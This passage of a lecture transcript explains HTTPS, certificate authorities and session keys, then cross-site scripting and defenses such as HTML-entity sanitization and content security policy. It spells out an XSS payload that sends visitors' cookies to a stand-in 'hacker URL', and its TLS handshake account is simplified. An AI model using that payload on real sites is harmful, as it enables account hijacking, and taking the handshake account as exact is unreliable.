741 00:38:51,060 --> 00:38:54,320 So for example, router A perhaps was infected 742 00:38:54,320 --> 00:38:57,510 by somebody who-- a router is just a computer as well. 743 00:38:57,510 --> 00:39:00,200 So perhaps it was infected by an adversary 744 00:39:00,200 --> 00:39:03,950 with some worm that will eventually make it part of some botnet, 745 00:39:03,950 --> 00:39:07,580 and it'll eventually start spamming some server somewhere. 746 00:39:07,580 --> 00:39:11,960 If router A is compromised in such a way that an adversary can just read all 747 00:39:11,960 --> 00:39:14,010 the traffic that flows through it-- and again, 748 00:39:14,010 --> 00:39:17,780 we're sending all of our traffic in an unencrypted fashion-- 749 00:39:17,780 --> 00:39:21,230 then we have another security loophole to deal with. 750 00:39:21,230 --> 00:39:27,440 So HTTPS resolves this problem by securing or encrypting 751 00:39:27,440 --> 00:39:32,150 all of the communications between a client and a server. 752 00:39:32,150 --> 00:39:33,762 So HTTP requests go to one port. 753 00:39:33,762 --> 00:39:34,970 We talked about that already. 754 00:39:34,970 --> 00:39:36,950 They go to port 80 by convention. 755 00:39:36,950 --> 00:39:40,790 HTTPS requests go to port 443 by convention. 756 00:39:40,790 --> 00:39:44,840 In order for HTTPS to work, the server is 757 00:39:44,840 --> 00:39:52,100 responsible for providing or possessing what's called a valid SSL or TLS 758 00:39:52,100 --> 00:39:52,670 certificate. 759 00:39:52,670 --> 00:39:55,550 SSL is actually a deprecated technology now. 760 00:39:55,550 --> 00:39:58,070 It's been subsumed into TLS. 761 00:39:58,070 --> 00:40:01,580 But typically these things are still referred to as SSL certificates. 762 00:40:01,580 --> 00:40:04,430 And perhaps you've seen a screen that looks like this when 763 00:40:04,430 --> 00:40:05,990 you're trying to visit some website.
764 00:40:05,990 --> 00:40:08,240 You get a warning that your connection is not private. 765 00:40:08,240 --> 00:40:10,970 And at the very end of that warning, you are 766 00:40:10,970 --> 00:40:13,640 informed that the cert date is invalid. 767 00:40:13,640 --> 00:40:18,900 Basically this just means that their SSL certificate has expired. 768 00:40:18,900 --> 00:40:21,510 Now, what is an SSL certificate? 769 00:40:21,510 --> 00:40:27,000 So there are services that work alongside the internet called 770 00:40:27,000 --> 00:40:28,020 certificate authorities. 771 00:40:28,020 --> 00:40:32,520 And like GlobalSign, for example, from whom I borrowed the screenshots-- 772 00:40:32,520 --> 00:40:35,280 GoDaddy, who is also a very popular domain name provider, 773 00:40:35,280 --> 00:40:37,780 is also a certificate authority. 774 00:40:37,780 --> 00:40:42,600 And what they do is they verify that a particular website owns 775 00:40:42,600 --> 00:40:44,270 a particular private key-- 776 00:40:44,270 --> 00:40:48,230 or excuse me, a particular public key which has a corresponding private key. 777 00:40:48,230 --> 00:40:49,980 And the way they do that is they digitally 778 00:40:49,980 --> 00:40:51,928 sign something to the certificate authority. 779 00:40:51,928 --> 00:40:54,720 The certificate authority then goes through those exact same checks 780 00:40:54,720 --> 00:40:56,595 that we've seen before for digital signatures 781 00:40:56,595 --> 00:40:59,460 to verify that, yes, this person must own this public key. 782 00:40:59,460 --> 00:41:03,810 And the idea for this is we're trusting that, 783 00:41:03,810 --> 00:41:06,750 when I send a communication to you as the website 784 00:41:06,750 --> 00:41:12,120 owner using the public key that you say is yours, then it really is yours. 
785 00:41:12,120 --> 00:41:16,110 There really is somebody out there or some third party 786 00:41:16,110 --> 00:41:19,530 that we've decided to collectively trust, the certificate authority, who 787 00:41:19,530 --> 00:41:20,670 is going to verify this. 788 00:41:20,670 --> 00:41:23,100 Now, why does this matter? 789 00:41:23,100 --> 00:41:27,570 Why do we need to verify that someone's public key is what they say it is? 790 00:41:27,570 --> 00:41:31,032 Well, it turns out that this idea of asymmetric encryption, 791 00:41:31,032 --> 00:41:33,990 or public and private key cryptography that we've previously discussed, 792 00:41:33,990 --> 00:41:38,520 does form part of the core of HTTPS. 793 00:41:38,520 --> 00:41:43,200 But as we'll see in a moment, we don't actually use public and private keys 794 00:41:43,200 --> 00:41:47,100 to communicate except at the very, very beginning of our interaction 795 00:41:47,100 --> 00:41:52,680 with some site when we are using HTTPS. 796 00:41:52,680 --> 00:41:56,370 So the way this really happens underneath the hood 797 00:41:56,370 --> 00:42:00,780 is via the secure sockets layer, SSL, which is now known as the transport 798 00:42:00,780 --> 00:42:02,950 layer security overall protocol. 799 00:42:02,950 --> 00:42:06,270 There's other things that are folded into it, but SSL is part of it. 800 00:42:06,270 --> 00:42:09,210 And this is what happens. 801 00:42:09,210 --> 00:42:14,970 When I am requesting a page from you, and you are the server, 802 00:42:14,970 --> 00:42:18,540 and I am requesting this via HTTPS, I am going 803 00:42:18,540 --> 00:42:22,800 to initially make a request using the public key that I believe 804 00:42:22,800 --> 00:42:24,780 is yours because the certificate authority has 805 00:42:24,780 --> 00:42:30,395 vouched for you, saying that I would like to make an encrypted request. 806 00:42:30,395 --> 00:42:32,520 And I don't want to send that request over the air.
807 00:42:32,520 --> 00:42:34,145 I don't want to send that in the clear. 808 00:42:34,145 --> 00:42:37,110 I want to send it to you using the encryption that you say is yours. 809 00:42:37,110 --> 00:42:41,160 So I send a request to you, encrypting it using your public key. 810 00:42:41,160 --> 00:42:42,180 You receive the request. 811 00:42:42,180 --> 00:42:45,150 You decrypt it using your private key. 812 00:42:45,150 --> 00:42:48,900 You see, OK, I see now that Doug wants to initiate a request with me, 813 00:42:48,900 --> 00:42:51,300 and you're going to fulfill the request. 814 00:42:51,300 --> 00:42:53,610 But you're also going to do one other thing. 815 00:42:53,610 --> 00:42:57,420 You're going to set a key. 816 00:42:57,420 --> 00:43:00,270 And you're going to send me back a key, not 817 00:43:00,270 --> 00:43:04,322 your public or private key, a different key, alongside the request that I made. 818 00:43:04,322 --> 00:43:06,780 And you're going to send it back to me using my public key. 819 00:43:06,780 --> 00:43:10,620 So the initial volley of communications back and forth between us 820 00:43:10,620 --> 00:43:13,230 is the same as any other encrypted communication 821 00:43:13,230 --> 00:43:16,140 using public and private keys that we've previously seen. 822 00:43:16,140 --> 00:43:18,270 I send a message to you using your public key. 823 00:43:18,270 --> 00:43:20,040 You decrypt it using your private key. 824 00:43:20,040 --> 00:43:26,340 You respond to me using my public key, and I decrypt it using my private key. 825 00:43:26,340 --> 00:43:28,260 But this is really slow. 826 00:43:28,260 --> 00:43:34,780 If we're just having communications back and forth via mail or even via text, 827 00:43:34,780 --> 00:43:39,210 the difference of a few milliseconds is immaterial. 828 00:43:39,210 --> 00:43:41,450 We don't really notice it. 
829 00:43:41,450 --> 00:43:44,757 But on the web, we do notice it, especially 830 00:43:44,757 --> 00:43:46,590 if we're making multiple requests or there's 831 00:43:46,590 --> 00:43:49,680 multiple packets going back and forth and every single one of them 832 00:43:49,680 --> 00:43:51,520 needs to be encrypted. 833 00:43:51,520 --> 00:43:55,650 So beyond this initial volley, public and private key encryption 834 00:43:55,650 --> 00:44:01,360 is no longer needed because it's no longer used, because it's too slow. 835 00:44:01,360 --> 00:44:03,610 We would notice it if we did. 836 00:44:03,610 --> 00:44:09,150 Instead, as I mentioned, the server is going to respond with a key. 837 00:44:09,150 --> 00:44:11,205 And that key is the key to a cipher. 838 00:44:11,205 --> 00:44:14,910 And we've talked about ciphers before and we know that they are reversible. 839 00:44:14,910 --> 00:44:19,350 The particular cipher in question here is something called AES. 840 00:44:19,350 --> 00:44:20,520 But it is just a cipher. 841 00:44:20,520 --> 00:44:21,960 It is reversible. 842 00:44:21,960 --> 00:44:24,360 And the key that you receive is the key that you 843 00:44:24,360 --> 00:44:28,410 are supposed to use to decrypt all future communications. 844 00:44:28,410 --> 00:44:30,060 This key is called the session key. 845 00:44:30,060 --> 00:44:33,360 And you use it to decrypt all future communications 846 00:44:33,360 --> 00:44:37,230 and use it to encrypt all future communications to the server 847 00:44:37,230 --> 00:44:40,350 until the session, so-called, is terminated. 848 00:44:40,350 --> 00:44:43,320 And the session is basically as long as you're on the site 849 00:44:43,320 --> 00:44:46,770 and you haven't logged out or closed the window. 850 00:44:46,770 --> 00:44:48,240 That is the idea of a session. 851 00:44:48,240 --> 00:44:53,685 It is one singular experience with a page 852 00:44:53,685 --> 00:44:57,750 or with a set of pages that are all part of the same domain name.
853 00:44:57,750 --> 00:45:00,960 We're just going to use a cipher for the rest of the time that we talk. 854 00:45:00,960 --> 00:45:03,932 Now, this may seem insecure for reasons we've 855 00:45:03,932 --> 00:45:05,640 talked about when we talked about ciphers 856 00:45:05,640 --> 00:45:07,470 and how they are inherently flawed. 857 00:45:07,470 --> 00:45:10,470 Recall that when we were talking about some of the really early ciphers, 858 00:45:10,470 --> 00:45:13,090 those are classic ciphers like Caesar and Vigenere, 859 00:45:13,090 --> 00:45:14,430 those are very easy to break. 860 00:45:14,430 --> 00:45:17,630 AES is much more complex than that. 861 00:45:17,630 --> 00:45:22,080 And the other upside is that this key, like I mentioned, 862 00:45:22,080 --> 00:45:23,910 is only good for a session. 863 00:45:23,910 --> 00:45:29,040 So in the unlikely event that the server chooses a bad key, for example, if we 864 00:45:29,040 --> 00:45:32,490 think about it as if it was Caesar, if they choose a key of zero, 865 00:45:32,490 --> 00:45:35,240 which would be a very bad key, one that doesn't actually 866 00:45:35,240 --> 00:45:40,113 shift the letters at all, even if the key is compromised, 867 00:45:40,113 --> 00:45:41,780 it's only good for a particular session. 868 00:45:41,780 --> 00:45:44,240 That's not a very long amount of time. 869 00:45:44,240 --> 00:45:47,240 But the upside is the ability to encipher 870 00:45:47,240 --> 00:45:49,520 and decipher information is much faster. 871 00:45:49,520 --> 00:45:53,390 If it's reversible, it's pretty quick to do some mathematical manipulation 872 00:45:53,390 --> 00:45:57,140 and transform it into something that looks obscured and gibberish 873 00:45:57,140 --> 00:45:59,240 and to undo that as well.
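In practice, the certificate check and the switch to a session cipher described above are carried out by a TLS library rather than by hand. The following is a minimal sketch, assuming Python's standard `ssl` module as the client library (the lecture does not name one). It only inspects the default client settings and makes no network connection.

```python
import ssl

# A client-side TLS context with the library's default settings.
context = ssl.create_default_context()

# By default the server must present a certificate that chains to a trusted
# certificate authority, and the name on it must match the requested host.
print(context.verify_mode == ssl.CERT_REQUIRED)
print(context.check_hostname)

# A few of the cipher suites this context is willing to negotiate for the
# session. The exact names depend on the local OpenSSL build.
for suite in context.get_ciphers()[:5]:
    print(suite["name"])
```

The names printed at the end vary by machine, so none are listed here. They are the symmetric ciphers available for the session once the initial exchange is complete.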
874 00:45:59,240 --> 00:46:03,020 And so even though public and private keys are-- 875 00:46:03,020 --> 00:46:05,780 we consider effectively unbreakable, like to the point 876 00:46:05,780 --> 00:46:10,040 of it's mathematically untenable to crack a message using 877 00:46:10,040 --> 00:46:11,510 public and private key encryption. 878 00:46:11,510 --> 00:46:16,010 We don't rely on it for SSL because it is impractical to actually expect 879 00:46:16,010 --> 00:46:17,450 communications to go that slowly. 880 00:46:17,450 --> 00:46:19,610 And so we do fall back on these ciphers. 881 00:46:19,610 --> 00:46:24,260 And that really is when you're using secured encrypted communication 882 00:46:24,260 --> 00:46:26,270 via HTTPS. 883 00:46:26,270 --> 00:46:27,980 You're just relying on a cipher that just 884 00:46:27,980 --> 00:46:31,700 happens to be a very, very fancy cipher that should hypothetically 885 00:46:31,700 --> 00:46:36,060 be very difficult to figure out the key to as well. 886 00:46:36,060 --> 00:46:40,280 You may have also seen a few changes in your browser, especially recently. 887 00:46:40,280 --> 00:46:42,170 This screenshot shows a couple of changes 888 00:46:42,170 --> 00:46:48,080 that are designed to warn you when you are not using HTTPS encryption. 889 00:46:48,080 --> 00:46:51,980 And it's not necessary to use HTTPS for every interaction you 890 00:46:51,980 --> 00:46:53,480 have on the internet. 891 00:46:53,480 --> 00:46:56,750 For example, if you are going to a site that is purely informational, 892 00:46:56,750 --> 00:47:00,900 it's just static content, it's just a list of information, there's no login, 893 00:47:00,900 --> 00:47:05,190 there's no buying, there's no clicking on things that might then get tracked, 894 00:47:05,190 --> 00:47:08,280 for example, it's not really necessary to use HTTPS. 
895 00:47:08,280 --> 00:47:11,630 So don't be necessarily alarmed if you visit a site 896 00:47:11,630 --> 00:47:14,180 and you're warned it's not secure. 897 00:47:14,180 --> 00:47:17,480 We're told that over time this will turn red and become perhaps even 898 00:47:17,480 --> 00:47:19,950 more concerning as more versions of this come out 899 00:47:19,950 --> 00:47:23,850 and as more and more adopters of HTTPS exist as well. 900 00:47:23,850 --> 00:47:25,850 But you're going to start getting notifications. 901 00:47:25,850 --> 00:47:27,725 And you may have seen these as well in green. 902 00:47:27,725 --> 00:47:29,870 If you are using HTTPS and you log into something, 903 00:47:29,870 --> 00:47:33,120 you'll see a little lock icon here and you'll be told that it is secure. 904 00:47:33,120 --> 00:47:35,570 And again, this is just because human beings 905 00:47:35,570 --> 00:47:40,460 tend not to be as concerned about their digital privacy 906 00:47:40,460 --> 00:47:43,430 and their digital security when using the internet. 907 00:47:43,430 --> 00:47:48,260 And now the technology is trying to provide clues and tips 908 00:47:48,260 --> 00:47:54,880 to entice you to be more concerned about these things. 909 00:47:54,880 --> 00:47:57,330 Now let's take a look at a couple of attacks 910 00:47:57,330 --> 00:47:59,640 that are derived from things we typically consider 911 00:47:59,640 --> 00:48:02,130 to be advantages of using the internet. 912 00:48:02,130 --> 00:48:07,050 The first of these is the idea of cross-site scripting, XSS. 913 00:48:07,050 --> 00:48:09,450 We've previously discussed this idea of the distinction 914 00:48:09,450 --> 00:48:11,700 between server-side code and client-side code. 915 00:48:11,700 --> 00:48:14,400 Client-side code, recall, is something that runs locally 916 00:48:14,400 --> 00:48:16,710 on our computer where our browser, for example, 917 00:48:16,710 --> 00:48:19,380 is expected to interpret and execute that code.
918 00:48:19,380 --> 00:48:22,000 Server-side code is run on the server. 919 00:48:22,000 --> 00:48:25,060 And when we get information from a server, 920 00:48:25,060 --> 00:48:27,630 we're not getting back the actual lines of code. 921 00:48:27,630 --> 00:48:31,028 We're getting back the output of that code having run in the first place. 922 00:48:31,028 --> 00:48:34,320 So for example, there might be some code on the server, some Python code or PHP 923 00:48:34,320 --> 00:48:38,220 code that generates HTML for us. 924 00:48:38,220 --> 00:48:42,570 The actual Python or PHP code in this example would be server-side code. 925 00:48:42,570 --> 00:48:44,430 We don't actually ever see that code. 926 00:48:44,430 --> 00:48:46,890 We only see the output of that code. 927 00:48:46,890 --> 00:48:50,550 A cross-site script vulnerability exists when 928 00:48:50,550 --> 00:48:57,180 an adversary is able to trick a client's browser to run something locally. 929 00:48:57,180 --> 00:49:01,860 And it will do something that presumably the person, the client, 930 00:49:01,860 --> 00:49:04,965 didn't actually intend to do. 931 00:49:04,965 --> 00:49:07,590 Let's take a look at an example of this using a very simple web 932 00:49:07,590 --> 00:49:09,150 server called Flask. 933 00:49:09,150 --> 00:49:10,575 We have here some Python code. 934 00:49:10,575 --> 00:49:13,200 And don't be too worried if this doesn't all make sense to you. 935 00:49:13,200 --> 00:49:20,050 It's just a pretty short, simple web server that does two things. 936 00:49:20,050 --> 00:49:22,170 So this is just some bookkeeping stuff in Flask. 937 00:49:22,170 --> 00:49:26,460 And Flask is a package of Python that is used to create web servers. 938 00:49:26,460 --> 00:49:29,100 This web server has two things, though, that it does. 939 00:49:29,100 --> 00:49:34,350 The first is when I visit slash on my web server-- 940 00:49:34,350 --> 00:49:36,750 so let's say this is Doug's site. 
941 00:49:36,750 --> 00:49:41,912 If I go to dougssite.com, which you may not actually explicitly type anymore 942 00:49:41,912 --> 00:49:43,620 but most browsers just add it, slash just 943 00:49:43,620 --> 00:49:47,730 means the root page of your server. 944 00:49:47,730 --> 00:49:50,430 I'm going to call the following function whose name happens 945 00:49:50,430 --> 00:49:52,440 to be called index in this case. 946 00:49:52,440 --> 00:49:53,970 Return hello world. 947 00:49:53,970 --> 00:49:58,770 And what this basically means is if I visit dougspage.com/, 948 00:49:58,770 --> 00:50:05,730 what I receive is an HTML page whose content is just hello world. 949 00:50:05,730 --> 00:50:09,060 So it's just an HTML file that says hello world. 950 00:50:09,060 --> 00:50:11,730 Again, this code here is all server-side code. 951 00:50:11,730 --> 00:50:14,130 You don't actually see this code. 952 00:50:14,130 --> 00:50:18,933 You only see the output of this code, which is this here, this HTML. 953 00:50:18,933 --> 00:50:21,100 It's just a simple string in this case, but it would 954 00:50:21,100 --> 00:50:25,080 be interpreted by the browser as HTML. 955 00:50:25,080 --> 00:50:27,920 If, however, I get a 404-- 956 00:50:27,920 --> 00:50:31,470 a 404 is a not found error. It means the page I requested doesn't exist. 957 00:50:31,470 --> 00:50:35,370 And since I've only defined the behavior for literally one page, 958 00:50:35,370 --> 00:50:41,790 slash the index page of my server, then I want to call this function not found. 959 00:50:41,790 --> 00:50:46,590 Return not found plus whatever page I tried to visit. 960 00:50:46,590 --> 00:50:50,550 So it basically is another very simple page, much like hello world here, 961 00:50:50,550 --> 00:50:53,980 where instead of saying hello world, it says not found. 962 00:50:53,980 --> 00:50:57,560 And then it also concatenates onto the very end of that whatever page 963 00:50:57,560 --> 00:50:59,760 I tried to visit.
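The two behaviors just described can be sketched as plain Python functions. This is an illustration under assumptions, not the code from the slide: in the lecture these handlers are registered with Flask, while here the function signatures and exact response strings are hypothetical stand-ins, so that the logic can be run without a web server.

```python
# Hypothetical stand-ins for the two handlers described above. In the lecture
# they are wired into Flask. Here they are ordinary functions.

def index() -> str:
    """Body returned for the root page, "/"."""
    return "Hello, world!"


def not_found(path: str) -> str:
    """Body returned for any other page: a message plus the requested path."""
    # The requested path is concatenated into the response unchanged.
    return "Not Found: " + path


print(index())
print(not_found("/foo"))
```

The point to notice is in `not_found`: whatever the visitor typed after the domain name goes straight into the page that is sent back.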
964 00:50:59,760 --> 00:51:03,960 This is a major cross-site scripting vulnerability. 965 00:51:03,960 --> 00:51:05,640 And let's see why. 966 00:51:05,640 --> 00:51:10,920 Let's imagine I go to /foo, so dougspage.com/foo. 967 00:51:10,920 --> 00:51:14,130 Recall that our error handler function, which I've reproduced down here, 968 00:51:14,130 --> 00:51:17,330 will return not found /foo. 969 00:51:17,330 --> 00:51:18,330 Seems pretty reasonable. 970 00:51:18,330 --> 00:51:22,260 It seems like the behavior I expected or intended to have happen. 971 00:51:22,260 --> 00:51:24,970 But what about if I go to a page like this one? 972 00:51:24,970 --> 00:51:29,490 So this is what I literally type in the browser, dougspage.com/ angle bracket, 973 00:51:29,490 --> 00:51:36,450 script, angle bracket alert(hi) and then a closed script tag there. 974 00:51:36,450 --> 00:51:42,770 This script here, script here, looks a lot like HTML. 975 00:51:42,770 --> 00:51:47,640 And in fact, when the browser sees this, it will interpret it as HTML. 976 00:51:47,640 --> 00:51:53,340 And so I will get returned by visiting this page not found and then everything 977 00:51:53,340 --> 00:51:57,150 here except for the leading slash, which means 978 00:51:57,150 --> 00:52:02,550 that when I receive this and my client is interpreting the HTML, 979 00:52:02,550 --> 00:52:05,502 I'm going to generate an alert. 980 00:52:05,502 --> 00:52:06,210 What is an alert? 981 00:52:06,210 --> 00:52:09,025 Well, if you've ever gone to a website and had a pop-up box display 982 00:52:09,025 --> 00:52:11,400 some information, you have to click OK or click X to make 983 00:52:11,400 --> 00:52:13,590 it go away, that's what an alert is.
984 00:52:13,590 --> 00:52:16,350 So I visit this page on my website, I've actually 985 00:52:16,350 --> 00:52:21,330 tricked my browser into giving me a JavaScript alert, 986 00:52:21,330 --> 00:52:23,850 or I've tricked whoever visits this page's browser 987 00:52:23,850 --> 00:52:26,070 to give me a JavaScript alert. 988 00:52:26,070 --> 00:52:29,980 So that's probably not exactly a good thing. 989 00:52:29,980 --> 00:52:33,540 But it can get a little bit more nefarious than that. 990 00:52:33,540 --> 00:52:36,670 Let's instead imagine-- instead of having this be on my server, 991 00:52:36,670 --> 00:52:41,250 it might be easier to imagine it like this, that this is what I wrote. 992 00:52:41,250 --> 00:52:45,698 This script tag here's what I wrote into my Facebook profile, for example. 993 00:52:45,698 --> 00:52:48,240 So Facebook gives you the ability to write a short little bio 994 00:52:48,240 --> 00:52:49,500 about yourself. 995 00:52:49,500 --> 00:52:54,927 Let's imagine that my bio was this script document.write, image source, 996 00:52:54,927 --> 00:52:56,760 and then I have a hacker URL and everything. 997 00:52:56,760 --> 00:52:58,760 And imagine that I own hacker URL. 998 00:52:58,760 --> 00:53:04,800 So I own hacker URL and I wrote this in my Facebook profile. 999 00:53:04,800 --> 00:53:08,010 Assuming that Facebook did not defend against cross-site scripting 1000 00:53:08,010 --> 00:53:11,740 attacks, which they do, but assuming that they did not, 1001 00:53:11,740 --> 00:53:15,540 anytime somebody visited my profile, their browser 1002 00:53:15,540 --> 00:53:19,810 would be forced to contend with this script tag here. 1003 00:53:19,810 --> 00:53:20,310 Why? 1004 00:53:20,310 --> 00:53:22,590 Because they're trying to visit my profile page. 1005 00:53:22,590 --> 00:53:26,610 My profile page contains literally these characters which 1006 00:53:26,610 --> 00:53:29,540 are going to be interpreted as HTML. 
1007 00:53:29,540 --> 00:53:33,990 And it's going to add document.write-- that's a JavaScript way of saying add 1008 00:53:33,990 --> 00:53:38,490 the following line in addition to the HTML of the page-- 1009 00:53:38,490 --> 00:53:44,700 image source equals hacker url?cookie= and then document.cookie. 1010 00:53:44,700 --> 00:53:48,210 So imagine that I, again, control hacker URL. 1011 00:53:48,210 --> 00:53:50,730 Presumably, as somebody who is running a website, 1012 00:53:50,730 --> 00:53:54,810 I also maintain logs of every time somebody tries to access my website, 1013 00:53:54,810 --> 00:53:57,960 what page on my site they're trying to visit. 1014 00:53:57,960 --> 00:54:00,690 If somebody goes to my Facebook profile and executes this, 1015 00:54:00,690 --> 00:54:06,270 I'm going to get notified via my hacker URL logs that somebody has tried to go 1016 00:54:06,270 --> 00:54:12,560 to that page ?cookie= and then document.cookie. 1017 00:54:12,560 --> 00:54:14,910 Now, document.cookie in this case, because this 1018 00:54:14,910 --> 00:54:21,670 exists on my Facebook profile, is an individual's cookie for Facebook. 1019 00:54:21,670 --> 00:54:24,000 So here what I am doing-- again, Facebook 1020 00:54:24,000 --> 00:54:26,310 does defend against cross-site scripting attacks, 1021 00:54:26,310 --> 00:54:28,230 so this can't actually happen on Facebook. 1022 00:54:28,230 --> 00:54:31,980 But assuming that they did not defend against them adequately, 1023 00:54:31,980 --> 00:54:36,210 what I'm basically doing is getting told via my log 1024 00:54:36,210 --> 00:54:38,520 that somebody tried to visit some page on my URL, 1025 00:54:38,520 --> 00:54:41,400 but the page that they tried to visit, I'm 1026 00:54:41,400 --> 00:54:46,170 plugging in and basically stealing the cookie that they use for Facebook. 1027 00:54:46,170 --> 00:54:48,873 And a cookie, recall, is sort of like a hand stamp. 
1028 00:54:48,873 --> 00:54:50,790 It's basically me, instead of having to re-log 1029 00:54:50,790 --> 00:54:53,602 into Facebook every time I want to use it, going up to Facebook 1030 00:54:53,602 --> 00:54:54,310 and saying, here. 1031 00:54:54,310 --> 00:54:56,070 You've already verified my identity. 1032 00:54:56,070 --> 00:54:59,040 Just take a look at this, and you get let in. 1033 00:54:59,040 --> 00:55:04,920 And now I hypothetically know someone else's Facebook cookie. 1034 00:55:04,920 --> 00:55:07,890 And if I was clever, I could try and use that 1035 00:55:07,890 --> 00:55:12,060 to change what my Facebook cookie is to that person's Facebook cookie. 1036 00:55:12,060 --> 00:55:17,220 And then suddenly I'm able to log in and view their profile and act as them. 1037 00:55:17,220 --> 00:55:19,290 This image tag here is just a clever trick 1038 00:55:19,290 --> 00:55:24,150 because the idea is that it's trying to pull some resource from my site. 1039 00:55:24,150 --> 00:55:25,060 It doesn't exist. 1040 00:55:25,060 --> 00:55:27,270 I don't have a list of all the cookies on Facebook. 1041 00:55:27,270 --> 00:55:32,040 But I'm being told that somebody is trying to access this URL on my site. 1042 00:55:32,040 --> 00:55:34,950 So the image tag is just sort of a trick to force 1043 00:55:34,950 --> 00:55:38,760 it to log something on my hacker URL. 1044 00:55:38,760 --> 00:55:43,170 But the idea here is that I would be able to steal somebody's Facebook 1045 00:55:43,170 --> 00:55:47,610 cookie where this attack's not well-defended against. 1046 00:55:47,610 --> 00:55:51,960 So what techniques can we use either for our own sites 1047 00:55:51,960 --> 00:55:55,980 when we are running to avoid cross-site scripting vulnerabilities 1048 00:55:55,980 --> 00:56:01,270 or to protect against cross-site scripting vulnerabilities? 
1049 00:56:01,270 --> 00:56:04,770 The first technique that we can use is to sanitize, so to speak, 1050 00:56:04,770 --> 00:56:08,400 all of the inputs that come in to our page. 1051 00:56:08,400 --> 00:56:10,610 So let's take a look at how exactly we might do this. 1052 00:56:10,610 --> 00:56:13,500 So it turns out that there are things called 1053 00:56:13,500 --> 00:56:19,080 HTML entities, which are other ways of representing certain characters in HTML 1054 00:56:19,080 --> 00:56:22,950 that might be considered special or control characters, so things like, 1055 00:56:22,950 --> 00:56:26,460 for example, this or this. 1056 00:56:26,460 --> 00:56:29,610 Typically, when a browser sees a character left 1057 00:56:29,610 --> 00:56:31,770 angle bracket or right angle bracket, it's 1058 00:56:31,770 --> 00:56:37,740 going to automatically interpret that as some HTML that it should then process. 1059 00:56:37,740 --> 00:56:39,930 So in the example I just showed a moment ago, 1060 00:56:39,930 --> 00:56:44,130 I was using the fact that whenever it sees angle brackets with script 1061 00:56:44,130 --> 00:56:47,050 around it, they're going to try and interpret whatever 1062 00:56:47,050 --> 00:56:49,470 is between those tags as a script. 1063 00:56:49,470 --> 00:56:52,920 One way for me to prevent that from being interpreted as a script 1064 00:56:52,920 --> 00:56:58,800 is to call this or call this something else other than just left angle bracket 1065 00:56:58,800 --> 00:57:00,130 and right angle bracket. 
1066 00:57:00,130 --> 00:57:03,780 And it turns out that there are these things called HTML entities that 1067 00:57:03,780 --> 00:57:08,250 can be used to refer to these characters instead, 1068 00:57:08,250 --> 00:57:13,440 such that if I sanitize my input in such a way 1069 00:57:13,440 --> 00:57:20,278 that every time somebody literally typed the character left angle bracket, 1070 00:57:20,278 --> 00:57:23,070 I had written some code that automatically took that and changed it 1071 00:57:23,070 --> 00:57:25,470 into ampersand lt;. 1072 00:57:25,470 --> 00:57:29,440 And then every time somebody wrote a greater than character, 1073 00:57:29,440 --> 00:57:35,670 or right angle bracket, I changed that in the code to ampersand gt;. 1074 00:57:35,670 --> 00:57:40,170 Then when my page was responsible for processing or interpreting something, 1075 00:57:40,170 --> 00:57:44,640 it wouldn't interpret this-- it would still display this character as a left 1076 00:57:44,640 --> 00:57:47,580 angle bracket or less than-- that's what the lt stands for here-- 1077 00:57:47,580 --> 00:57:49,290 or a right angle bracket, greater than. 1078 00:57:49,290 --> 00:57:52,210 That's what the gt stands for there. 1079 00:57:52,210 --> 00:57:55,960 It would literally just show those characters and not treat them as HTML. 1080 00:57:55,960 --> 00:58:00,030 So that's the idea of what it means to sanitize input when we're talking 1081 00:58:00,030 --> 00:58:04,510 about HTML entities, for example. 1082 00:58:04,510 --> 00:58:08,160 Another thing that we could do is just disable JavaScript entirely. 1083 00:58:08,160 --> 00:58:10,290 This would have some upsides and some downsides. 1084 00:58:10,290 --> 00:58:13,440 The upside is you're pretty protected against cross-site scripting 1085 00:58:13,440 --> 00:58:17,820 vulnerabilities because they're usually going to be introduced via JavaScript. 1086 00:58:17,820 --> 00:58:20,100 The downside is JavaScript is pretty convenient. 
1087 00:58:20,100 --> 00:58:20,670 It's nice. 1088 00:58:20,670 --> 00:58:22,770 It makes for a better user experience. 1089 00:58:22,770 --> 00:58:24,930 Sometimes there might be parts of our page 1090 00:58:24,930 --> 00:58:29,040 that just don't work if JavaScript is completely disabled, 1091 00:58:29,040 --> 00:58:30,540 and so trade-offs there. 1092 00:58:30,540 --> 00:58:33,360 You're protecting yourself, but you might be doing 1093 00:58:33,360 --> 00:58:37,050 other sorts of non-material damage. 1094 00:58:37,050 --> 00:58:40,142 Or we could decide to just handle the JavaScript in a special way. 1095 00:58:40,142 --> 00:58:41,850 So for example, we might not allow what's 1096 00:58:41,850 --> 00:58:44,940 called inline JavaScript, for example, like the script tags 1097 00:58:44,940 --> 00:58:46,470 that I just showed a moment ago. 1098 00:58:46,470 --> 00:58:50,010 But we might allow JavaScripts written in separate JavaScript files 1099 00:58:50,010 --> 00:58:52,870 which can also be linked into your HTML pages. 1100 00:58:52,870 --> 00:58:56,280 So those would be allowed, but inline JavaScript, like what we just saw, 1101 00:58:56,280 --> 00:58:57,690 would not be allowed. 1102 00:58:57,690 --> 00:59:01,890 We could sandbox the JavaScript and run it separately somewhere else first 1103 00:59:01,890 --> 00:59:06,210 to see if it does something weird, and if it doesn't do something weird, 1104 00:59:06,210 --> 00:59:08,580 then allow it to be displayed. 1105 00:59:08,580 --> 00:59:12,390 We could also execute the content security policy. 1106 00:59:12,390 --> 00:59:15,570 Content security policy is another header 1107 00:59:15,570 --> 00:59:20,370 that we can add to our HTML pages or HTTP responses. 1108 00:59:20,370 --> 00:59:22,350 And we can define certain behavior to happen 1109 00:59:22,350 --> 00:59:25,800 such that will allow certain lines or certain types of JavaScript through 1110 00:59:25,800 --> 00:59:28,167 but not others. 
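Two of the defenses above, sanitizing input with HTML entities and sending a content security policy header, can be sketched in a few lines. This is a hedged example and not the lecture's own code: the function name `not_found_sanitized`, the sample path, and the particular policy value are assumptions chosen for illustration. `html.escape` is part of Python's standard library.

```python
import html


def not_found_sanitized(path: str) -> str:
    """Hypothetical 404 body that escapes the path before echoing it."""
    # html.escape replaces <, > and & (and, by default, quote characters)
    # with HTML entities such as &lt; and &gt;.
    return "Not Found: " + html.escape(path)


# An assumed example path containing a script tag.
payload = "/<script>alert('hi')</script>"
print(not_found_sanitized(payload))

# An example policy value (an assumption, one of many possible policies):
# allow scripts loaded from the site's own origin and, because inline
# scripts are not listed, refuse inline <script> blocks.
CSP_HEADER = ("Content-Security-Policy", "script-src 'self'")
print(": ".join(CSP_HEADER))
```

With the escaping in place, a browser displays the angle brackets as ordinary text instead of treating them as the start of a tag. The header is a second layer that applies even if some input slips through unescaped.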
